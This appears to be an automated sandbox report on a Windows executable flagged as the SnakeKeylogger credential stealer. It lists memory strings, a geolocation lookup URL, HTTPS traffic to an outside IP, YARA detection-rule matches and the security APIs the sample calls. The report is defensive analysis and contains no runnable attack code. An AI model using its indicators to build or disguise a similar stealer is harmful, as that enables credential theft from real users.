                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2

                System Summary

                barindex
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_01526F900_2_01526F90
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0152D3E40_2_0152D3E4
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_055869B00_2_055869B0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_05581BF00_2_05581BF0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_055800400_2_05580040
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_055800060_2_05580006
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_055869A10_2_055869A1
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748E6F80_2_0748E6F8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748CD800_2_0748CD80
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07486DA80_2_07486DA8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07487CB80_2_07487CB8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07485B880_2_07485B88
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07489F700_2_07489F70
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07489F800_2_07489F80
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748E6E90_2_0748E6E9
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A5400_2_0748A540
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A5500_2_0748A550
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748CD6F0_2_0748CD6F
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07488D000_2_07488D00
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07488D100_2_07488D10
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07486D980_2_07486D98
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D4C00_2_0748D4C0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07484C990_2_07484C99
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07484CA80_2_07484CA8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D4B00_2_0748D4B0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07489B500_2_07489B50
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07489B600_2_07489B60
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07485B790_2_07485B79
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A3700_2_0748A370
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748EBC00_2_0748EBC0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748EBD00_2_0748EBD0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A3800_2_0748A380
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_074863990_2_07486399
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_074863A80_2_074863A8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07487BB70_2_07487BB7
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D2680_2_0748D268
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D2620_2_0748D262
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D0080_2_0748D008
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748E00A0_2_0748E00A
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748D0180_2_0748D018
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748E0180_2_0748E018
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A0E10_2_0748A0E1
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0748A0F00_2_0748A0F0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_077582380_2_07758238
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0775822B0_2_0775822B
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_077561600_2_07756160
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07755D280_2_07755D28
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_077579600_2_07757960
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_077558F00_2_077558F0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_010771183_2_01077118
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107C1473_2_0107C147
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_010753703_2_01075370
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107D2783_2_0107D278
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107C4683_2_0107C468
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107C7383_2_0107C738
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107E9883_2_0107E988
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_010769A03_2_010769A0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107CA083_2_0107CA08
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_01079DE03_2_01079DE0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107CCD83_2_0107CCD8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107CFAA3_2_0107CFAA
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_01073E093_2_01073E09
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107F9613_2_0107F961
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_0107E97A3_2_0107E97A
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_010729E03_2_010729E0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A496683_2_06A49668
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A41FA83_2_06A41FA8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A49D903_2_06A49D90
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A42A903_2_06A42A90
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A418503_2_06A41850
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A451483_2_06A45148
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4D6603_2_06A4D660
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4D6703_2_06A4D670
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A41F9B3_2_06A41F9B
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4E7C03_2_06A4E7C0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4E7CF3_2_06A4E7CF
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4E7D03_2_06A4E7D0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4DF203_2_06A4DF20
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4DF113_2_06A4DF11
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4DF1F3_2_06A4DF1F
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A48CB13_2_06A48CB1
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A48CC03_2_06A48CC0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4F4D83_2_06A4F4D8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4EC283_2_06A4EC28
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4EC183_2_06A4EC18
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A494483_2_06A49448
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4CDAF3_2_06A4CDAF
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4CDC03_2_06A4CDC0
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A49D293_2_06A49D29
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4DAB93_2_06A4DAB9
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4DAC83_2_06A4DAC8
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4D2093_2_06A4D209
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4D2183_2_06A4D218
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A40B203_2_06A40B20
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A40B303_2_06A40B30
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4E36B3_2_06A4E36B
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4E3783_2_06A4E378
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4F0803_2_06A4F080
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A400073_2_06A40007
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4F0713_2_06A4F071
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A400403_2_06A40040
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A418413_2_06A41841
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4F9233_2_06A4F923
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4F9303_2_06A4F930
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A4513B3_2_06A4513B
                Source: n8l3NmC5EH.exe, 00000000.00000000.1320619875.0000000000C22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWOBv.exeB vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000000.00000002.1350035719.0000000007F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000000.00000002.1334763772.000000000330B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000000.00000002.1334071497.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000003.00000002.3794458044.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exe, 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exeBinary or memory string: OriginalFilenameWOBv.exeB vs n8l3NmC5EH.exe
                Source: n8l3NmC5EH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: n8l3NmC5EH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, -A.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, -A.csBase64 encoded string: 'rFj51hzTeDKXAHk4x2M7Rn97FogUA8nI3ZaQ8vHDilMhMV3gp+As5w==', 'Spm992E313fSbY5NiAI++96f46zzQ4rWZMrJrVgeO2ZPAMMyJRZuntKcMKKK3uV2'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
